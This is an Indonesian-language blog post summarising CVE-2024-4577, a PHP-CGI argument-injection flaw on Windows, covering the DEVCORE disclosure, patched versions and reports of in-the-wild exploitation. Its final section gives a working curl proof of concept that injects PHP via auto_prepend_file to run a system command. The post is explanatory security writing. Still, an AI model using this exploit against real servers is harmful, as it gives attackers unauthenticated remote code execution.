All about exploit
CVE-2024-4577-PHP
CVE-2024-4577 - Kerentanan yang Mengancam PHP di Windows
Baru-baru ini muncul detail tentang celah keamanan kritikal yang memengaruhi PHP, yang dapat dieksploitasi untuk melakukan eksekusi kode jarak jauh dalam kondisi tertentu.
Kerentanan ini, yang dikenal sebagai CVE-2024-4577, digambarkan sebagai injection argument CGI yang memengaruhi semua versi PHP yang diinstal pada sistem operasi Windows.
Menurut peneliti keamanan dari DEVCORE, kelemahan ini memungkinkan penyerang untuk melewati perlindungan yang sebelumnya diterapkan untuk celah keamanan lainnya, yakni CVE-2012-1823.
"Selama penerapan PHP, tim pengembang tidak menyadari fitur Best-Fit dari konversi encoding dalam sistem operasi Windows," kata peneliti keamanan Orange Tsai.
"Kelemahan ini memungkinkan penyerang yang tidak terauthentikasi untuk melewati perlindungan yang diterapkan pada CVE-2012-1823 dengan urutan karakter tertentu. Kode dapat dieksekusi pada server PHP ."
Setelah melakukan responsible disclosure pada 7 Mei 2024, patch untuk mengatasi kerentanan ini telah tersedia pada PHP versi 8.3.8, 8.2.20, dan 8.1.29. DEVCORE memperingatkan bahwa semua instalasi XAMPP di Windows rentan secara default jika dikonfigurasi menggunakan lokal untuk Bahasa Mandarin Tradisional, Mandarin Sederhana, atau Jepang.
Perusahaan asal Taiwan ini juga merekomendasikan agar para administrator beralih dari PHP CGI yang sudah usang dan memilih solusi yang lebih aman seperti Mod-PHP, FastCGI, atau PHP-FPM.
The Shadowserver Foundation, dalam sebuah posting di platform X (sebelumnya Twitter), mengatakan bahwa mereka telah mendeteksi upaya eksploitasi terhadap kerentanan ini pada server honeypot mereka dalam waktu 24 jam setelah pengungkapan publik.
watchTowr Labs juga mengatakan bahwa mereka berhasil menyusun exploit untuk CVE-2024-4577 dan mencapai eksekusi kode jarak jauh, sehingga sangat penting bagi pengguna untuk segera mengaplikasikan patch terbaru.
"Ini adalah bug yang berbahaya dengan exploit yang sangat sederhana," kata peneliti keamanan Aliz Hammond.
PoC (Proof of Concept) Menggunakan cURL untuk CVE-2024-4577
Berikut adalah PoC (Proof of Concept) sederhana untuk CVE-2024-4577 menggunakan cURL. Versi ini menggantikan script Python dengan cURL agar lebih mudah digunakan. Eksploitasi ini memanfaatkan injeksi argumen CGI yang memungkinkan penyerang menjalankan kode PHP secara remote
curl -X POST "http://192.168.1.1/index.php?%ADd+allow_url_include=1+-d+auto_prepend_file=php://input" \
--data "<?php system('calc'); echo 1337; ?>"
Semoga blog ini bermanfaat untuk membantu memahami kerentanan CVE-2024-4577 dan cara mengeksploitasinya dengan aman di lingkungan pengujian.